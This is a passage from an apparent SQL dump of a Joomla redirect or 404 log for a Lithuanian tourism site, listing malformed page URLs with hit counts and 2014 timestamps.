00:00:00'),(985,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/apie-centra/parama//','','','',1,0,'2014-09-29 06:55:09','0000-00-00 00:00:00'),(986,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/lankytini-objektai/kulturos-paveldo-objektai','','','',1,0,'2014-09-29 07:14:38','0000-00-00 00:00:00'),(987,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/tytuvenu-festivalis/programos','','','',1,0,'2014-09-29 07:19:58','0000-00-00 00:00:00'),(988,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/kulinarinis-paveldas','','','',1,0,'2014-09-29 07:24:07','0000-00-00 00:00:00'),(989,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/naujienos','','','',1,0,'2014-09-29 07:29:38','0000-00-00 00:00:00'),(990,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/varniu-regioninis-parkas','','','',1,0,'2014-09-29 08:12:57','0000-00-00 00:00:00'),(991,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/varniu-regioninis-parkas//','','','',1,0,'2014-09-29 08:39:19','0000-00-00 00:00:00'),(992,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apie-centra/edukacines-programos//','','','',1,0,'2014-09-29 09:02:19','0000-00-00 00:00:00'),(993,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/tytuvenu-regioninis-parkas','','','',1,0,'2014-09-29 09:07:47','0000-00-00 00:00:00'),(994,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-29 09:31:05','0000-00-00 00:00:00'),(995,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/ekskursijos','','','',1,0,'2014-09-29 10:01:21','0000-00-00 00:00:00'),(996,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/13-sample-data-article/demo/features/31-renginiai','','','',1,0,'2014-09-29 10:05:45','0000-00-00 00:00:00'),(997,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apgyvendinimas','','','',1,0,'2014-09-29 10:33:04','0000-00-00 00:00:00'),(998,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/paslaugos','','','',1,0,'2014-09-29 10:36:18','0000-00-00 00:00:00'),(999,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/suvenyrai','','','',1,0,'2014-09-29 11:04:35','0000-00-00 00:00:00'),(1000,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/suvenyrai','','','',1,0,'2014-09-29 11:11:23','0000-00-00 00:00:00'),(1001,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-29 11:29:57','0000-00-00 00:00:00'),(1002,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/kontaktai','','','',1,0,'2014-09-29 11:55:32','0000-00-00 00:00:00'),(1003,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/veiklos-strategija','','','',1,0,'2014-09-29 12:09:25','0000-00-00 00:00:00'),(1004,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra','','','',1,0,'2014-09-29 12:11:52','0000-00-00 00:00:00'),(1005,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apgyvendinimas/apgyvendinimas','','','',1,0,'2014-09-29 12:17:31','0000-00-00 00:00:00'),(1006,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/istatai//','','','',1,0,'2014-09-29 12:31:17','0000-00-00 00:00:00'),(1007,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/tytuvenu-festivalis/kontaktai','','','',1,0,'2014-09-29 12:39:37','0000-00-00 00:00:00'),(1008,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/tytuvenu-festivalis/programos//','','','',1,0,'2014-09-29 12:48:36','0000-00-00 00:00:00'),(1009,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-29 12:52:13','0000-00-00 00:00:00'),(1010,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/programos//','','','',1,0,'2014-09-29 13:08:24','0000-00-00 00:00:00'),(1011,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-29 13:29:03','0000-00-00 00:00:00'),(1012,'http://www.infotytuvenai.lt/index.php/index.php/index.php/turizmo-informacija/suvenyrai//','','','',1,0,'2014-09-29 13:37:27','0000-00-00 00:00:00'),(1013,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/galerija','','','',1,0,'2014-09-29 14:14:57','0000-00-00 00:00:00'),(1014,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-29 14:22:00','0000-00-00 00:00:00'),(1015,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/turizmo-marsrutai','','','',1,0,'2014-09-29 14:29:58','0000-00-00 00:00:00'),(1016,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/parama//','','','',1,0,'2014-09-29 14:56:01','0000-00-00 00:00:00'),(1017,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra','','','',1,0,'2014-09-29 15:39:26','0000-00-00 00:00:00'),(1018,'http://www.infotytuvenai.lt/index.php/apie-centra/ekskursijos//','','','',1,0,'2014-09-29 15:45:04','0000-00-00 00:00:00'),(1019,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/lankytini-objektai/muziejai//','','','',1,0,'2014-09-29 15:53:48','0000-00-00 00:00:00'),(1020,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apie-centra/istatai//','','','',1,0,'2014-09-29 16:17:15','0000-00-00 00:00:00'),(1021,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/projektai/i-etapas-baznycios-restauravimas','','','',1,0,'2014-09-29 16:55:55','0000-00-00 00:00:00'),(1022,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/suvenyrai','','','',1,0,'2014-09-29 17:12:32','0000-00-00 00:00:00'),(1023,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2014-09-29 17:16:06','0000-00-00 00:00:00'),(1024,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-29 17:33:18','0000-00-00 00:00:00'),(1025,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/../../undefined/','','','',1,0,'2014-09-29 17:43:05','0000-00-00 00:00:00'),(1026,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/tytuvenu-festivalis/galerija','','','',1,0,'2014-09-29 17:48:53','0000-00-00 00:00:00'),(1027,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/naujienos//','','','',1,0,'2014-09-29 18:03:04','0000-00-00 00:00:00'),(1028,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/apie-centra/istatai//','','','',1,0,'2014-09-29 18:26:26','0000-00-00 00:00:00'),(1029,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/tytuvenu-festivalis/programos//','','','',1,0,'2014-09-29 19:06:49','0000-00-00 00:00:00'),(1030,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/kontaktai','','','',1,0,'2014-09-29 19:12:44','0000-00-00 00:00:00'),(1031,'http://www.infotytuvenai.lt/index.php/index.php/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-09-29 19:51:48','0000-00-00 00:00:00'),(1032,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-09-29 19:56:38','0000-00-00 00:00:00'),(1033,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/istatai','','','',1,0,'2014-09-29 20:00:35','0000-00-00 00:00:00'),(1034,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/suvenyrai//','','','',1,0,'2014-09-29 20:01:30','0000-00-00 00:00:00'),(1035,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/paslaugos','','','',1,0,'2014-09-29 20:09:25','0000-00-00 00:00:00'),(1036,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/tytuvenu-festivalis/naujienos//','','','',1,0,'2014-09-29 20:14:30','0000-00-00 00:00:00'),(1037,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-09-29 20:16:48','0000-00-00 00:00:00'),(1038,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apgyvendinimas','','','',2,0,'2014-09-29 21:00:03','0000-00-00 00:00:00'),(1039,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-29 21:15:01','0000-00-00 00:00:00'),(1040,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/maitinimas','','','',1,0,'2014-09-29 21:19:13','0000-00-00 00:00:00'),(1041,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/tytuvenu-festivalis/naujienos//','','','',1,0,'2014-09-29 21:21:47','0000-00-00 00:00:00'),(1042,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/lankytini-objektai/kulturos-paveldo-objektai//','','','',1,0,'2014-09-29 21:55:46','0000-00-00 00:00:00'),(1043,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/parama','','','',1,0,'2014-09-29 22:08:39','0000-00-00 00:00:00'),(1044,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-09-29 22:13:57','0000-00-00 00:00:00'),(1045,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-09-29 22:53:48','0000-00-00 00:00:00'),(1046,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-09-29 23:09:44','0000-00-00 00:00:00'),(1047,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-29 23:43:26','0000-00-00 00:00:00'),(1048,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/apie-centra/galerija','','','',1,0,'2014-09-29 23:55:20','0000-00-00 00:00:00'),(1049,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/apgyvendinimas/kaimo-turizmas','','','',1,0,'2014-09-30 00:49:46','0000-00-00 00:00:00'),(1050,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/turizmo-marsrutai','','','',2,0,'2014-09-30 01:06:44','0000-00-00 00:00:00'),(1051,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/naujienos//','','','',1,0,'2014-09-30 01:13:41','0000-00-00 00:00:00'),(1052,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/kulinarinis-paveldas','','','',1,0,'2014-09-30 01:31:10','0000-00-00 00:00:00'),(1053,'http://www.infotytuvenai.lt/index.php/index.php/apgyvendinimas/index.php/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2014-09-30 01:39:25','0000-00-00 00:00:00'),(1054,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/tytuvenu-regioninis-parkas//','','','',1,0,'2014-09-30 02:06:28','0000-00-00 00:00:00'),(1055,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-09-30 02:18:10','0000-00-00 00:00:00'),(1056,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-30 02:20:54','0000-00-00 00:00:00'),(1057,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-30 02:27:54','0000-00-00 00:00:00'),(1058,'http://www.infotytuvenai.lt/index.php/index.php/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-30 02:58:40','0000-00-00 00:00:00'),(1059,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/lankytini-objektai/kulturos-paveldo-objektai//','','','',1,0,'2014-09-30 03:19:49','0000-00-00 00:00:00'),(1060,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/galerija//','','','',1,0,'2014-09-30 03:35:40','0000-00-00 00:00:00'),(1061,'http://www.infotytuvenai.lt/index.php/apie-centra/parama//','','','',1,0,'2014-09-30 03:43:46','0000-00-00 00:00:00'),(1062,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/galerija//','','','',1,0,'2014-09-30 03:54:28','0000-00-00 00:00:00'),(1063,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-09-30 03:59:10','0000-00-00 00:00:00'),(1064,'http://www.infotytuvenai.lt/index.php/apie-centra/galerija//','','','',1,0,'2014-09-30 04:08:58','0000-00-00 00:00:00'),(1065,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-30 05:06:51','0000-00-00 00:00:00'),(1066,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-30 05:30:02','0000-00-00 00:00:00'),(1067,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-09-30 05:55:18','0000-00-00 00:00:00'),(1068,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/istatai//','','','',1,0,'2014-09-30 07:06:39','0000-00-00 00:00:00'),(1069,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/turizmo-informacija/varniu-regioninis-parkas//','','','',1,0,'2014-09-30 07:17:57','0000-00-00 00:00:00'),(1070,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija','','','',1,0,'2014-09-30 07:44:29','0000-00-00 00:00:00'),(1071,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-09-30 07:49:56','0000-00-00 00:00:00'),(1072,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-30 07:59:32','0000-00-00 00:00:00'),(1073,'http://www.infotytuvenai.lt/index.php/index.php/index.php/../../undefined/','','','',1,0,'2014-09-30 08:13:38','0000-00-00 00:00:00'),(1074,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/istatai//','','','',1,0,'2014-09-30 08:27:35','0000-00-00 00:00:00'),(1075,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/apie-centra/paslaugos//','','','',1,0,'2014-09-30 08:29:42','0000-00-00 00:00:00'),(1076,'http://www.infotytuvenai.lt/index.php/index.php/apie-centra/ekskursijos//','','','',1,0,'2014-09-30 08:38:23','0000-00-00 00:00:00'),(1077,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/galerija//','','','',1,0,'2014-09-30 08:56:19','0000-00-00 00:00:00'),(1078,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/galerija','','','',1,0,'2014-09-30 09:02:00','0000-00-00 00:00:00'),(1079,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/parama','','','',1,0,'2014-09-30 09:17:14','0000-00-00 00:00:00'),(1080,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/galerija//','','','',1,0,'2014-09-30 09:34:21','0000-00-00 00:00:00'),(1081,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/index.php/apie-centra/istatai//','','','',1,0,'2014-09-30 09:37:37','0000-00-00 00:00:00'),(1082,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-30 09:54:15','0000-00-00 00:00:00'),(1083,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/galerija','','','',1,0,'2014-09-30 10:03:40','0000-00-00 00:00:00'),(1084,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-30 10:15:33','0000-00-00 00:00:00'),(1085,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/parama//','','','',1,0,'2014-09-30 11:04:25','0000-00-00 00:00:00'),(1086,'http://www.infotytuvenai.lt/index.php/index.php/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-30 11:24:46','0000-00-00 00:00:00'),(1087,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas//','','','',1,0,'2014-09-30 11:37:10','0000-00-00 00:00:00'),(1088,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apie-centra/darbo-uzmokestis//','','','',1,0,'2014-09-30 11:45:56','0000-00-00 00:00:00'),(1089,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/darbo-uzmokestis//','','','',1,0,'2014-09-30 11:57:58','0000-00-00 00:00:00'),(1090,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/turizmo-informacija/dubysos-regioninis-parkas//','','','',1,0,'2014-09-30 12:44:52','0000-00-00 00:00:00'),(1091,'http://www.infotytuvenai.lt/index.php/index.php/13-sample-data-article/demo/features/index.php/apie-centra/paslaugos//','','','',1,0,'2014-09-30 12:59:40','0000-00-00 00:00:00'),(1092,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/13-sample-data-article/demo/features/31-renginiai','','','',1,0,'2014-09-30 13:34:51','0000-00-00 00:00:00'),(1093,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-30 13:39:31','0000-00-00 00:00:00'),(1094,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/tytuvenu-festivalis/galerija','','','',1,0,'2014-09-30 13:49:35','0000-00-00 00:00:00'),(1095,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/ekskursijos','','','',1,0,'2014-09-30 14:01:34','0000-00-00 00:00:00'),(1096,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2014-09-30 14:10:39','0000-00-00 00:00:00'),(1097,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/projektai/ii-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-30 14:23:33','0000-00-00 00:00:00'),(1098,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/apie-centra/galerija//','','','',1,0,'2014-09-30 15:24:32','0000-00-00 00:00:00'),(1099,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/13-sample-data-article/demo/features/31-renginiai','','','',1,0,'2014-09-30 15:31:07','0000-00-00 00:00:00'),(1100,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/suvenyrai//','','','',1,0,'2014-09-30 15:50:11','0000-00-00 00:00:00'),(1101,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/lankytini-objektai/kulturos-paveldo-objektai','','','',1,0,'2014-09-30 16:12:52','0000-00-00 00:00:00'),(1102,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-09-30 17:13:43','0000-00-00 00:00:00'),(1103,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-09-30 18:01:17','0000-00-00 00:00:00'),(1104,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/suvenyrai','','','',1,0,'2014-09-30 18:21:11','0000-00-00 00:00:00'),(1105,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2014-09-30 18:22:11','0000-00-00 00:00:00'),(1106,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apgyvendinimas','','','',1,0,'2014-09-30 18:33:45','0000-00-00 00:00:00'),(1107,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/turizmo-informacija/dubysos-regioninis-parkas','','','',1,0,'2014-09-30 18:53:35','0000-00-00 00:00:00'),(1108,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-30 19:06:42','0000-00-00 00:00:00'),(1109,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-09-30 19:23:44','0000-00-00 00:00:00'),(1110,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/tytuvenu-festivalis/galerija//','','','',1,0,'2014-09-30 19:28:38','0000-00-00 00:00:00'),(1111,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/lankytini-objektai/muziejai','','','',1,0,'2014-09-30 19:41:20','0000-00-00 00:00:00'),(1112,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apie-centra/istatai','','','',1,0,'2014-09-30 19:44:24','0000-00-00 00:00:00'),(1113,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-09-30 19:50:30','0000-00-00 00:00:00'),(1114,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-09-30 19:59:34','0000-00-00 00:00:00'),(1115,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/index.php/turizmo-informacija/varniu-regioninis-parkas//','','','',1,0,'2014-09-30 20:44:18','0000-00-00 00:00:00'),(1116,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-30 22:17:01','0000-00-00 00:00:00'),(1117,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apgyvendinimas/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-09-30 22:30:00','0000-00-00 00:00:00'),(1118,'http://www.infotytuvenai.lt/index.php/index.php/index.php/index.php/turizmo-informacija/kulinarinis-paveldas//','','','',1,0,'2014-09-30 22:41:30','0000-00-00 00:00:00'),(1119,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/parama','','','',1,0,'2014-09-30 23:10:41','0000-00-00 00:00:00'),(1120,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-09-30 23:19:02','0000-00-00 00:00:00'),(1121,'http://www.infotytuvenai.lt/index.php/13-sample-data-article/demo/features/index.php/apgyvendinimas/kaimo-turizmas//','','','',1,0,'2014-09-30 23:33:25','0000-00-00 00:00:00'),(1122,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features//','','','',1,0,'2014-09-30 23:48:16','0000-00-00 00:00:00'),(1123,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/apie-centra/paslaugos','','','',1,0,'2014-10-01 00:03:32','0000-00-00 00:00:00'),(1124,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apgyvendinimas/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/gido-paslaugos//','','','',1,0,'2014-10-01 00:07:42','0000-00-00 00:00:00'),(1125,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/index.php/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-10-01 00:21:53','0000-00-00 00:00:00'),(1126,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/varniu-regioninis-parkas','','','',1,0,'2014-10-01 00:54:07','0000-00-00 00:00:00'),(1127,'http://www.infotytuvenai.lt/index.php/index.php/index.php/apie-centra/paslaugos//','','','',1,0,'2014-10-01 01:30:29','0000-00-00 00:00:00'),(1128,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/index.php/turizmo-informacija/tytuvenu-regioninis-parkas//','','','',1,0,'2014-10-01 01:43:12','0000-00-00 00:00:00'),(1129,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra/veiklos-strategija','','','',1,0,'2014-10-01 01:46:41','0000-00-00 00:00:00'),(1130,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/projektai/i-etapas-baznycios-restauravimas//','','','',1,0,'2014-10-01 02:10:20','0000-00-00 00:00:00'),(1131,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/galerija//','','','',1,0,'2014-10-01 02:30:24','0000-00-00 00:00:00'),(1132,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/index.php/index.php/apie-centra','','','',1,0,'2014-10-01 02:35:28','0000-00-00 00:00:00'),(1133,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/varniu-regioninis-parkas//','','','',1,0,'2014-10-01 03:54:17','0000-00-00 00:00:00'),(1134,'http://www.infotytuvenai.lt/index.php/index.php/index.php/tytuvenu-festivalis/index.php/apgyvendinimas/apgyvendinimas','','','',1,0,'2014-10-01 04:01:16','0000-00-00 00:00:00'),(1135,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apgyvendinimas/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas//','','','',1,0,'2014-10-01 04:04:07','0000-00-00 00:00:00'),(1136,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/projektai/i-etapas-baznycios-restauravimas','','','',1,0,'2014-10-01 04:08:24','0000-00-00 00:00:00'),(1137,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/index.php/index.php/turizmo-informacija/turizmo-marsrutai','','','',1,0,'2014-10-01 04:12:40','0000-00-00 00:00:00'),(1138,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apie-centra/viesieji-pirkimai//','','','',1,0,'2014-10-01 04:41:30','0000-00-00 00:00:00'),(1139,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/13-sample-data-article/demo/features/index.php/apie-centra/darbo-uzmokestis//','','','',1,0,'2014-10-01 05:14:26','0000-00-00 00:00:00'),(1140,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/13-sample-data-article/demo/features/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-10-01 05:25:38','0000-00-00 